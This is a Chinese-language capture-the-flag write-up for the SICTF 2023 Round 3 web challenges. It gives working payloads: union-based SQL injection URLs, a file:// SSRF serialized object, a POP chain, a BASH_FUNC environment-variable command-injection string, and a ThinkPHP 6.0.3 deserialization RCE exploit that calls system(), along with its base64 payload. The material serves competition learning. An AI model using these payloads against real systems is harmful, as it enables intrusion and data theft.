SICTF 2023 Round#3 团队赛 Web 方向个人题解
February 21, 2024 · Legacy Blog ↗
100%_upload
将一句话木马 Base64 编码后上传,然后用 filter 将其 include。
hacker
试了下发现只有 ?username=flag 是有值的,那就接着写 SQL 吧!稍微有点过滤,问题不大:
view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database())%23
可以查到有这些表: flag, users
view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b,%27,%27,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)as/**/d)%23
users 表里没啥东西
view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select/**/*/**/from/**/flag)as/**/d)%23
flag 真的在 flag 表里: flag, SICTF{5b6247d8-9e5b-4cbc-a579-9d779fec77ef}EZ_SSRF
不要相信出题人说 Flag 在 /flag 就可以了:
class client
{
public $url;
public $payload;
}
$target = 'file:///var/www/html/flag.php';
$obj = new client();
$obj->url = $target;
echo serialize($obj);Not just unserialize
POP 链并不难构造:
$obj = new start();
$obj->you = '233';
$obj->welcome = new SE();
$obj->welcome->year = new CR();
$obj->welcome->year->newyear = "WORRIES";
$obj->welcome->year->last = new ET();
print(base64_encode(serialize($obj)));有点难度的是利用环境变量进行 RCE,还好有参考资料。
get[BASH_FUNC_echo%%]=%28%29%20%7B%20cat%20%2F%2A%3B%20%7D
^ () { cat /*; }Oyst3rPHP
这题有源代码泄露直接 www.zip 把它扒下来一看果然是 ThinkPHP。
public function index()
{
echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
echo "<img src='../Oyster.png'" . "/>";
$payload = base64_decode(@$_POST['payload']);
$right = @$_GET['left'];
$left = @$_GET['right'];
$key = (string)@$_POST['key'];
if ($right !== $left && md5($right) == md5($left)) {
echo "Congratulations on getting your first oyster";
echo "<img src='../Oyster1.png'" . "/>";
if (preg_match('/.+?THINKPHP/is', $key)) {
die("Oysters don't want you to eat");
}
if (stripos($key, '603THINKPHP') === false) {
die("!!!Oysters don't want you to eat!!!");
}
echo "WOW!!!Congratulations on getting your second oyster";
echo "<img src='../Oyster2.png'" . "/>";
@unserialize($payload);
//最后一个生蚝在根目录,而且里面有Flag???咋样去找到它呢???它的名字是什么???
//在源码的某处注释给出了提示,这就看你是不是真懂Oyst3rphp框架咯!!!
//小Tips:细狗函数┗|`O′|┛ 嗷~~
}
}这部分并不难绕,主要还是 ThinkPHP 6.0.3 的反序列化 RCE。网上随便扒个 Exp 下来:
namespace think\model\concern;
trait Attribute
{
private $data = ["key" => "cat /Oyst3333333r.php"];
private $withAttr = ["key" => "system"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave = true;
protected $withEvent = false;
private $exists = true;
private $force = true;
protected $name;
public function __construct($obj = "")
{
$this->name = $obj;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
echo base64_encode(serialize($b));
// fetch("http://yuanshen.life:37154/?left=QNKCDZO&right=240610708", {
// "headers": { "content-type": "application/x-www-form-urlencoded" },
// "body": "key=" + "0".repeat(1000000) + "603THINKPHP&payload=TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjc6IgAqAG5hbWUiO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo3OiIAKgBuYW1lIjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319",
// "method": "POST"
// });Tags: #CTF #Writeup #Web #SICTF
This article is authored by luoingly and licensed under CC BY-NC 4.0
Permalink: https://luoy.ing/posts/sictf-2023-round3-web-writeup/